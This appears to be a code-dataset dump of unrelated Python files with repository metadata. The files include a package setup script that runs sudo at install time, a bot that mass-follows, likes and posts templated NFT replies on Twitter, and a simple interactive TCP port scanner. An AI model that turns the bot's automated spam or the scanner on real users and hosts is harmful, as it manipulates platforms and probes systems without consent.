install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 39.4375
| 159
| 0.692552
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
def get_data_files():
data_files = [('/usr/share/sysmontask/glade_files', ['glade_files/disk.glade','glade_files/diskSidepane.glade','glade_files/gpu.glade',
'glade_files/gpuSidepane.glade','glade_files/net.glade','glade_files/netSidepane.glade','glade_files/sysmontask.glade','glade_files/filter_dialog.glade']),
('/usr/share/sysmontask/icons',['icons/SysMonTask.png']),
('/usr/share/doc/sysmontask',['AUTHORS', 'README.md','LICENSE']),
('/usr/share/applications',['SysMonTask.desktop']),
('/usr/share/glib-2.0/schemas',['com.github.camelneeraj.sysmontask.gschema.xml'])
]
return data_files
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='neerajjangra4u@gmail.com',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 603
| 0
| 23
|
34090bb1e8c0e500ca86d957c3a062355daf3cc0
| 8,337
|
py
|
Python
|
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | 1
|
2022-01-12T01:14:12.000Z
|
2022-01-12T01:14:12.000Z
|
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | null | null | null |
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | null | null | null |
from typing import List
import random
from time import sleep
from tweepy import Client
from TwitterAPI import TwitterAPI
| 33.083333
| 168
| 0.576946
|
from typing import List
import random
from time import sleep
from tweepy import Client
from TwitterAPI import TwitterAPI
class Twitter:
creds : dict
hash_tags: list
nfts_to_tweet: dict
nfts_to_reply: dict
def __init__(self, creds: dict, nfts_to_tweet: dict, nfts_to_reply: dict) -> None:
self.creds = creds
self.nfts_to_tweet = nfts_to_tweet
self.nfts_to_reply = nfts_to_reply
self.influencers = ["OpenSea", "ZssBecker", "rarible", "beeple", "BoredApeYC", "elliotrades", "MetaMask", "TheSandboxGame", "TheBinanceNFT", "DCLBlogger",
"thebrettway", "decentraland", "niftygateway", "MrsunNFT", "BinanceChain"]
self.hash_tags = ["#NFTArt", "#NFTCommunity", "#NFTCollection", "#NFTArtist", "#NFTs"]
self.my_user_id = "1474097571408883730"
def _get_bearer_client(self) -> Client:
client = Client(bearer_token = self.creds["bearer_token"], wait_on_rate_limit = True)
return client
def _get_access_client(self) -> Client:
client = Client(consumer_key = self.creds["consumer_key"],
consumer_secret = self.creds["consumer_secret"],
access_token = self.creds["access_token"],
access_token_secret = self.creds["access_secret"],
wait_on_rate_limit = True)
return client
def _search_followables(self) -> List[str]:
client = self._get_bearer_client()
influencer = client.get_user(username = random.choice(self.influencers))
choices = ["follow from tweets", "follow from followers"]
if random.choice(choices) == choices[0]:
print("searching from tweets")
tweets = self._get_user_timeline_tweets(user_id = influencer.data["id"])
tweets = [t for t in tweets.data]
random.shuffle(tweets)
likers = []
for i in range(5):
chosen_tweet = tweets.pop(0)
temp = client.get_liking_users(id = chosen_tweet.id)
new = [l.id for l in temp.data]
likers += new
return likers
else:
temp = client.get_users_followers(id = influencer.data["id"], max_results = 1000)
followers = [f.id for f in temp.data]
return followers
def _get_user_timeline_tweets(self, user_id: str) -> list:
client = self._get_bearer_client()
tweets = client.get_users_tweets(id = user_id, exclude = ["retweets"])
return tweets
def _like_tweet(self, tweet_id: str) -> None:
client = self._get_access_client()
response = client.like(tweet_id = tweet_id)
def _follow(self, user_id: str) -> None:
client = self._get_access_client()
response = client.follow_user(target_user_id = user_id)
def _get_my_timeline(self) -> list:
client = self._get_bearer_client()
ts = client.get_users_tweets(id = self.my_user_id, tweet_fields = ["context_annotations"])
tweets = []
retweets = []
for tweet in ts.data:
if tweet.data["text"].startswith("@"):
retweets.append(tweet)
else:
tweets.append(tweet)
return tweets, retweets
def _search_tweets_to_reply(self) -> List[str]:
client = self._get_bearer_client()
query = ["drop your nft -is:retweet"]
ts = client.search_recent_tweets(query = query, tweet_fields = ["context_annotations"], max_results = 100)
tweets = []
for tweet in ts.data:
if tweet["text"].startswith("@") == False:
tweets.append(tweet)
return tweets
def _reply(self, tweet_id: str) -> None:
chosen_nft = random.choice(list(self.nfts_to_reply.keys()))
nft_info = self.nfts_to_reply[chosen_nft]
collection = nft_info["collection"]
link = nft_info["link"]
random.shuffle(self.hash_tags)
hashtags = f"{self.hash_tags[0]} {self.hash_tags[1]} {self.hash_tags[2]} {self.hash_tags[3]} {self.hash_tags[4]}"
text1 = random.choice(["Get this #NFT", "Check this #NFT", "How about this #NFT"])
text2 = random.choice([":", " to display in the #Metaverse:", " for you #Metaverse collection:"])
text3 = random.choice(["by me", "by myself", "by yours truly"])
text4 = random.choice(["From the", "Part of the", "Out of the"])
text5 = random.choice(["Luxury", ""])
text6 = random.choice(["available at", "only at", "at"])
text = f'{text1}{text2}"{chosen_nft}" {text3} #JacquesDeVoid | {text4} {collection} {text5} Collection {text6} @opensea\n\n {hashtags} \n {link}'
client = self._get_access_client()
response = client.create_tweet(text = text, in_reply_to_tweet_id = tweet_id)
self._like_tweet(tweet_id = response.data["id"])
def _get_my_retweets(self) -> List[str]:
tweets = self._get_my_timeline()[1]
return tweets
def _get_my_tweets(self) -> List[str]:
tweets = self._get_my_timeline()[0]
return tweets
def _delete_tweet(self, tweet_id: str) -> None:
client = self._get_access_client()
response = client.delete_tweet(id = tweet_id)
def _get_my_num_followers(self) -> int:
api = TwitterAPI(self.creds["consumer_key"],
self.creds["consumer_secret"],
self.creds["access_token"],
self.creds["access_secret"],
api_version = "2")
followers = api.request(f"users/:{self.my_user_id}/followers")
count = len([f for f in followers])
return count
def reply_something(self) -> None:
tweets = self._search_tweets_to_reply()
for tweet in tweets:
self._like_tweet(tweet_id = tweet.data["id"])
tweet = random.choice(tweets)
self._reply(tweet_id = tweet.data["id"])
def delete_my_timeline(self) -> None:
tweets = self._get_my_tweets()
for tweet in tweets:
self._delete_tweet(tweet_id = tweet.data["id"])
def follow_people(self) -> None:
num_followers = self._get_my_num_followers()
if num_followers < 1000:
num_followers = 1000
coef = 0.08
to_follow = coef*num_followers
count = 0
if to_follow > 500:
to_follow = 500
while count < to_follow:
people = self._search_followables()
if people != None:
if len(people) > to_follow - count:
index = to_follow - count
else:
index = len(people)
for i in range(int(index)):
sleep(random.randint(60, 180))
self._follow(user_id = people[i])
count += 1
def tweet(self) -> None:
chosen_nft = random.choice(list(self.nfts_to_tweet.keys()))
nft_info = self.nfts_to_tweet.pop(chosen_nft)
collection = nft_info["collection"]
link = nft_info["link"]
random.shuffle(self.hash_tags)
hashtags = f"{self.hash_tags[0]} {self.hash_tags[1]} {self.hash_tags[2]} {self.hash_tags[3]} {self.hash_tags[4]} #Metaverse"
text1 = random.choice(["Behold", "How about", "Check", "How would you like"])
text2 = random.choice(["this", "my"])
text3 = random.choice(["amazing", "awesome"])
text4 = random.choice(["by me", "by myself", "by yours truly"])
text5 = random.choice(["From the", "Part of the", "Out of the"])
text6 = random.choice(["Luxury", ""])
text7 = random.choice(["available at", "only at", "at"])
text = f'{text1} {text2} {text3} "{chosen_nft}" #NFT {text4} #JacquesDeVoid | {text5} {collection} {text6} Collection {text7} @opensea\n\n {hashtags} \n {link}'
client = self._get_access_client()
response = client.create_tweet(text = text)
self._like_tweet(tweet_id = response.data["id"])
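# A minimal usage sketch.  The keys in `creds` mirror what the class reads above;
# all values, NFT names and links are placeholders.
def _sketch_run_bot():
    """Sketch: build the helper and send one promotional tweet."""
    creds = {"bearer_token": "...", "consumer_key": "...", "consumer_secret": "...",
             "access_token": "...", "access_secret": "..."}
    nfts_to_tweet = {"Dream #1": {"collection": "Dreams",
                                  "link": "https://opensea.io/assets/..."}}
    bot = Twitter(creds=creds, nfts_to_tweet=dict(nfts_to_tweet),
                  nfts_to_reply=dict(nfts_to_tweet))
    bot.tweet()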
| 7,600
| 591
| 23
|
210a678a3c714cdead1544323597dcdb1cff8f70
| 323
|
py
|
Python
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 2
|
2021-12-22T07:43:14.000Z
|
2021-12-24T12:07:33.000Z
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | null | null | null |
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 1
|
2021-12-22T07:43:26.000Z
|
2021-12-22T07:43:26.000Z
|
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 24.846154
| 54
| 0.616099
|
def non_start(str1, str2):
if len(str1) >= 1 and len(str2) >= 1:
newstr = str1[1:len(str1)] + str2[1:len(str2)]
return newstr
else:
return False
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 155
| 0
| 22
|
a1b5ff50c9c782fea188c9b6fb9e25d0a0c8232c
| 705
|
py
|
Python
|
port.py
|
hawk-0fcx/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | 1
|
2022-03-12T11:33:16.000Z
|
2022-03-12T11:33:16.000Z
|
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LÜTFEN İP ADRESİNİ GİRİNİZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESİNİ GİRİNİZ : "))
portScanner(port)
| 26.111111
| 68
| 0.537589
|
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LÜTFEN İP ADRESİNİ GİRİNİZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESİNİ GİRİNİZ : "))
def portScanner(port):
if s.connect_ex((host, port)):
print(Fore.GREEN + "BU PORT KAPALI")
else:
print(Fore.GREEN + "BU PORT AÇIK")
portScanner(port)
| 135
| 0
| 23
|
09bff90f642cffe4743a7a3613eb947ba5cade52
| 156
|
py
|
Python
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 341
|
2018-04-26T08:46:05.000Z
|
2022-03-01T08:13:39.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 24
|
2020-09-30T19:57:14.000Z
|
2021-10-05T07:21:09.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 128
|
2018-05-07T07:30:29.000Z
|
2022-02-19T17:53:39.000Z
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 78
| 90
| 0.788462
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
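# A hedged follow-up: the density version divides by area first (assuming the
# geometries are in a metric CRS; the new column name is made up)
districts['population_density'] = districts['population'] / (districts.geometry.area / 10**6)
districts.plot(column='population_density', figsize=(12, 6), legend=True)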
| 0
| 0
| 0
|
15c549b448318131afb3c0205f8085e21f227080
| 9,494
|
py
|
Python
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 41
|
2015-05-21T21:12:26.000Z
|
2022-02-17T17:23:14.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 63
|
2015-05-15T10:25:55.000Z
|
2021-02-23T04:51:17.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 12
|
2015-06-12T11:52:08.000Z
|
2020-09-23T10:40:59.000Z
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
execute(None,doit, argspec)
| 48.192893
| 123
| 0.425637
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
def doit(args) :
global file
action = args.action
params = args.paramsobj
logger=params.logger
varlist = ['url', 'copyright', 'license', 'author', 'version']
copyrightpre = 'Copyright (c) '
copyrightpost = ' SIL International (http://www.sil.org)'
standards = {
'copyright': copyrightpre + cyear + copyrightpost,
'version': params.sets['default']['version'],
'url': 'http://github.com/silnrsi/pysilfont',
'license': 'Released under the MIT License (http://opensource.org/licenses/MIT)'}
pythonfiles = {}
otherfiles = []
for subdir, dirs, files in os.walk("."):
if not (subdir=="." or subdir[0:5] in ("./lib","./scr")) : continue
if subdir[0:] == "./lib/pysilfont.egg-info" : continue
for filen in files:
if filen[-1:]=="~" : continue
if filen[-3:]=="pyc" : continue
if filen in ("__init__.py", "ez_setup.py") : continue
needver = (True if filen in ('setup.py', 'param.py') else False)
fulln = os.path.join(subdir,filen)
file = open(fulln,"r")
line1 = nextline()
pyline1 = (True if line1 in ("#!/usr/bin/env python", "#!/usr/bin/python") else False)
if pyline1 or filen[-3:] == ".py" :
# Look for standard headers
headererror = []
headers = "#!/usr/bin/env python"
if pyline1 :
# Read description which may be single or multiline
line = nextline()
headers = headers + "\n"+line
if line[0:3] == "'''" :
while line[-3:] != "'''" :
line = nextline()
if line =="EOF" : break # Must be EOF
headers = headers + "\n"+line
if line =="EOF" : headererror.append("No closing ''' to description")
elif line[0:1] != "'" : headererror.append("No description")
if headererror :
for line in headererror : logger.log(fulln + ": "+line,"E")
continue
# Read header variables
headvar={}
line = nextline()
while line[0:2] == "__" :
endn = line.find("__ = '")
if endn == -1 : std = headererror.append("Invalid variable line: " + line)
varn = line[2:endn]
val = line[endn+6:-1]
headvar[varn] = val
line = nextline()
# Check header variables
updatevars = {}
reportvars = {}
author = None
for varn in varlist :
if varn in headvar:
headval = headvar[varn]
if varn == 'author' : # Simply use existing author
author = headval
elif varn == "version" and not needver :
updatevars[varn] = "deleted"
elif varn == "copyright" : # Need to check dates and use oldest
# Find existing dates, assuming format 20nn and one or two dates
cdate = cyear
valid = True
datpos = headval.find("20")
if datpos != -1 :
# read any more digits
cdate='20'
nextpos = datpos+2
while headval[nextpos] in '0123456789' and nextpos < len(headval) :
cdate = cdate + headval[nextpos]
nextpos += 1
# Look for second date
rest = headval[nextpos:]
datpos = rest.find("20")
date2 = ""
if datpos != -1 :
date2 = '20'
nextpos = datpos+2
while rest[nextpos] in '0123456789' and nextpos < len(rest) :
date2 = date2 + rest[nextpos]
nextpos += 1
cval=int(cdate)
if cval < 2000 or cval > int(cyear) : valid = False
if date2 != "" :
val2 = int(date2)
if val2 < cval or val2 > int(cyear) : valid = False
if not valid : cdate = cyear
copyright = copyrightpre + cdate + copyrightpost
if headval != copyright :
updatevars[varn] = ("updated" if valid else "update (invalid dates)")
else :
if headval != standards[varn] :
updatevars[varn] = "updated"
else :
if varn == 'author' :
reportvars[varn] = "no author"
elif varn == "version" and not needver :
pass
else:
updatevars[varn] ="added"
for varn in headvar:
if varn not in varlist: reportvars[varn] = "non-standard"
else :
logger.log( fulln + ": " + "No python header - first line is " + line1, "E")
continue
else :
otherfiles.append(fulln)
continue
# Now have python file with no errors, so can update headers
if action == 'update' and updatevars :
logger.log("Updating "+fulln,"P")
outfile = open("update_headers_temp.txt", "w")
outfile.write(headers + "\n")
for varn in varlist :
if varn == "version" and not needver :
pass
elif varn == "author" :
if author : outfile.write("__author__ = '" + author + "'\n")
elif varn == "copyright" :
outfile.write("__copyright__ = '" + copyright + "'\n")
else:
outfile.write("__" + varn + "__ = '" + standards[varn] + "'\n")
if varn in updatevars :
reason = updatevars[varn]
if reason == "no author" :
logger.log("No author header variable ", "I")
else :
logger.log("Header variable " + varn + " " + reason, "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
outfile.write("__" + varn + "__ = '" + headvar[varn] + "'\n")
logger.log("Non-standard header variable " + varn + " retained", "W")
else:
logger.log("No author header variable", "I")
# Write the rest of the file
outfile.write(line + "\n") # last line read checking headers
for line in file: outfile.write(line)
outfile.close()
file.close()
os.rename(fulln, fulln+"~")
os.rename("update_headers_temp.txt",fulln)
else :
for varn in updatevars :
logger.log(fulln + ": Header variable " + varn + " will be " + updatevars[varn], "I")
for varn in reportvars :
reason = reportvars[varn]
if reason == "non-standard" :
logger.log(fulln + ": Non-standard header variable " + varn + " present", "W")
else:
logger.log(fulln + ": No author header variable", "I")
print "\n"+"Non-python files"+"\n"
for filen in otherfiles:
print filen
return
def nextline() :
global file
line = file.readline()
line = ("EOF" if line == "" else line.strip())
return line
execute(None,doit, argspec)
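# A sketch of the header layout this script checks for and rewrites: the shebang,
# a one-line (or triple-quoted) description, then the double-underscore variables
# in the order of varlist above.  The description and author values here are made
# up; the url/copyright/license strings follow the standards dict.
_EXAMPLE_HEADER = """#!/usr/bin/env python
'One-line description of the tool'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'Jane Doe'
"""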
| 8,728
| 0
| 46
|
83d2715a3c28310e7a615f390760361ca9c50fc6
| 1,976
|
py
|
Python
|
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
rapidtest/executors/__init__.py
|
yehzhang/RapidTest
|
2302fc10ddafba1d16ef1d7448d46c66f5a05da2
|
[
"MIT"
] | null | null | null |
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
atexit.register(_close_executors)
del _close_executors
| 30.875
| 97
| 0.674089
|
import atexit
import logging
from inspect import isclass
from .common_executors import BaseExecutor
from .externel_executors import ExternalExecutorFabric
from .java import *
from .operations import Operation, Operations
from .python import *
from ..utils import isstring
logger = logging.getLogger(__name__)
class BaseTarget(object):
def __init__(self, executor):
self.executor = executor
class Target(BaseTarget):
_executors_pool = {}
def __init__(self, target, target_name=None, env=None):
"""Factory class for building executors
:param Callable|str target: a native object or a path to an external file, which contains
the structure to be tested
:param str target_name: if target is a path, this indicates the name of the structure to
test
:param str env: environment of the target, usually just the language name itself
"""
executor_id = (target, target_name)
if executor_id not in self._executors_pool:
# Find the corresponding executor
if isstring(target):
cls = ExternalExecutorFabric.get(env) or ExternalExecutorFabric.guess(target)
executor = cls(target, target_name)
elif callable(target):
executor = (ClassExecutor if isclass(target) else FunctionExecutor)(target)
else:
raise TypeError('Target is not a callable nor str')
self._executors_pool[executor_id] = executor
super(Target, self).__init__(self._executors_pool[executor_id])
@classmethod
def close(cls):
for executor_id, e in list(cls._executors_pool.items()):
target, _ = executor_id
logger.debug('Executor %s on %s closed', e.ENVIRONMENT, target)
e.close()
del cls._executors_pool[executor_id]
def _close_executors():
Target.close()
atexit.register(_close_executors)
del _close_executors
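# A minimal usage sketch.  The callable case follows the docstring above; the
# external-file path, class name and env value are made up.
def _sketch_targets():
    """Sketch: build executors for a native callable and an external file."""
    def add(a, b):
        return a + b
    native = Target(add)                                         # wraps a Python callable
    external = Target("Solution.java", "Solution", env="java")   # path/name/env are placeholders
    return native.executor, external.executor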
| 304
| 1,206
| 95
|
5855a718f19fd271a7d90653c654f8cb39f399af
| 83
|
py
|
Python
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 1
|
2015-08-27T13:03:27.000Z
|
2015-08-27T13:03:27.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | 22
|
2015-08-23T18:17:30.000Z
|
2015-09-16T13:38:36.000Z
|
src/polls/forLoop5.py
|
Prince-linux/python-learning
|
75335ed497081b557400a05320b52b8889c3e1f4
|
[
"MIT"
] | null | null | null |
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 13.833333
| 27
| 0.53012
|
for i in range(201, 0, -2):
print(i)
for i in range(100, 0, -1):
print(i)
| 0
| 0
| 0
|
ca4f6f3248cffb86968c72e3aaf6cc6ec45f47c6
| 430
|
py
|
Python
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | 2
|
2022-01-01T19:31:56.000Z
|
2022-01-01T19:32:54.000Z
|
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
Vars & Data Entry/exercicio 3.py
|
SkaarlK/Learning-Python
|
bbf011182fb5bf876aa9a274400c41a266a0e8c7
|
[
"MIT"
] | null | null | null |
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 71.666667
| 101
| 0.711628
|
dias = int(input("Insira os dias para virarem segundos: "))
horas = int(input("Insira as horas para virarem segundos: "))
minutos = int(input("Insira os minutos para virarem segundos: "))
segundos = int(input("Insira os segundos para serem somados aos anteriores: "))
segundos += (dias * 86400) + (horas * 3600) + (minutos * 60)
print("Total de dias, horas, minutos e segundos informados foram de: " + str(segundos) + " segundos")
| 0
| 0
| 0
|
c06c9c6d5402fedf403bcb579088899fc6cd9baf
| 748
|
py
|
Python
|
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
motivate_gui.py
|
neesara/motivate
|
36cfb2a3502d48b99189841f35b9693e40dd8532
|
[
"MIT"
] | null | null | null |
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 39.368421
| 165
| 0.71123
|
import tkinter as tk
import os
import random
import datetime
root = tk.Tk()
root.title("Motivation")
root.configure(background='white')
command=os.getcwd()+'/motivate/motivate.py'
quote=os.popen(command).read()
color=random.choice(['green','blue','purple','red','orange','brown','magenta','violet','maroon','olive','lime','teal','navy','DarkSlateGray','m','indigo','crimson'])
label=tk.Label(root, text = quote ,fg=color, bg='white', font='Helvetica 10',wraplength=900).pack()
if datetime.datetime.today().weekday() == 4 :
label=tk.Label(root, text = "Timesheet!!" ,fg='red', bg='white', font='Helvetica 20',wraplength=900,pady=10).pack()
quit_btn=tk.Button(root,text="Quit",command=root.destroy)
quit_btn.pack(side="bottom")
root.mainloop()
| 0
| 0
| 0
|
fc06bae0a0175ddaa81e9b5257fbdf007c920b1c
| 100
|
py
|
Python
|
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | null | null | null |
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | null | null | null |
Code/bin_manager/mgr_Analytics/apps.py
|
kailashmuralidharan/smartbin
|
87f762f7d15e0da6645ce62c49f6a8b4ccfe785d
|
[
"MIT"
] | 1
|
2020-01-22T10:35:38.000Z
|
2020-01-22T10:35:38.000Z
|
from django.apps import AppConfig
| 16.666667
| 36
| 0.78
|
from django.apps import AppConfig
class MgrAnalyticsConfig(AppConfig):
name = 'mgr_Analytics'
| 0
| 42
| 23
|
57bdb73e1704842d0766817fd5391f99486fe936
| 2,062
|
py
|
Python
|
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
tests/test_normalization.py
|
learniotai/iotai-sensor-classifications
|
ba2527cb317afa30a5c495d1cddc16f7dc2936ed
|
[
"Apache-2.0"
] | null | null | null |
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
| 54.263158
| 113
| 0.727934
|
"""Test normalizing gesture recording data."""
import os
import numpy as np
from iotai_sensor_classification.recording import read_recordings
from iotai_sensor_classification.normalization import normalize_mean_std_dict
from data.gestures import linear_accelerometer
from iotai_sensor_classification.plot_util import column_histograms, plot_columns, \
plot_lines, histogram_overlay
SAMPLES_PER_RECORDING = 160
def test_normalize_gesture_data():
recordings_dir = os.path.dirname(linear_accelerometer.__file__)
raw_gestures = read_recordings(recordings_dir=recordings_dir)
normalized_gestures = normalize_mean_std_dict(raw_gestures)
test_output = os.path.join("test_output", "gestures", "normalized")
os.makedirs(test_output, exist_ok=True)
for gesture in normalized_gestures.keys():
normalized = normalized_gestures[gesture]
column_histograms(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-histograms.png"))
plot_columns(normalized, name=f"{gesture} gesture normalized",
filepath=os.path.join(test_output, f"{gesture}-norm-plots.png"))
